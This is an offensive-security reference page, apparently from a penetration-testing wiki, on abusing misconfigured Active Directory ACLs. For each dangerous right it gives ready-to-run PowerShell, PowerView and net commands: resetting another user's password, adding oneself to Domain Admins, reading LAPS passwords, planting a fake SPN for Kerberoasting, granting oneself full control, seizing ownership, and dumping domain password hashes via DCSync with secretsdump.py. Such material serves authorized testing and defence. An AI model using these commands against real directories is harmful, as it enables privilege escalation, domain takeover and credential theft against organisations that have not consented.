ACL Abuse

Exploitation

Active Directory objects are protected by Access Control Lists (ACLs). Misconfigured permissions can allow low-privileged users to modify high-privileged objects, leading to domain compromise.

Common Dangerous Rights

Object Control

  • GenericAll - Full control over the object.
  • GenericWrite - Write access to all properties.
  • WriteOwner - Ability to change the object's owner.
  • WriteDACL - Ability to modify the object's ACL.

Specific Actions

  • ForceChangePassword - Reset user password without knowing current one.
  • AddMember - Add members to a group.
  • Self (Membership) - Add self to a group.
  • DCSync - Replicate directory changes (dump hashes).

Exploitation Techniques

ACL-based attacks exploit excessive permissions on AD objects. Tools like BloodHound are essential for identifying these paths.

GenericAll on User

Full control allows you to reset passwords, set SPNs for Kerberoasting, or modify other attributes.

Reset password:

powershell 
net user targetuser NewPassword123! /domain

Or using PowerView:

powershell 
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)

GenericAll on Group

Allows adding members to the group.

Add yourself to the group:

powershell 
Add-DomainGroupMember -Identity "Domain Admins" -Members "youruser"

Or using net commands:

powershell 
net group "Domain Admins" youruser /add /domain

GenericAll on Computer

Allows performing RBCD attacks (see Delegation section) or reading LAPS passwords if available.

Read LAPS password:

powershell 
Get-DomainComputer TARGET -Properties ms-mcs-admpwd | Select-Object ms-mcs-admpwd

GenericWrite

Allows modifying attributes. A common attack is to set an SPN on a user to make them vulnerable to Kerberoasting.

Set SPN for Kerberoasting:

powershell 
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}

WriteDACL

Allows modifying the object's ACL. You can grant yourself full control (GenericAll).

Grant yourself GenericAll:

powershell 
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity youruser -Rights All

WriteOwner

Allows taking ownership of the object. Once you are the owner, you can modify the ACL to grant yourself full control.

Take ownership:

powershell 
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity youruser

DCSync Rights

If you have "Replicating Directory Changes" and "Replicating Directory Changes All" rights on the domain object, you can perform a DCSync attack to dump hashes.

Dump hashes via DCSync:

bash 
secretsdump.py corp.local/youruser:password@DC_IP

Related Topics

AD Attack Paths

BloodHound Analysis

Credential Attacks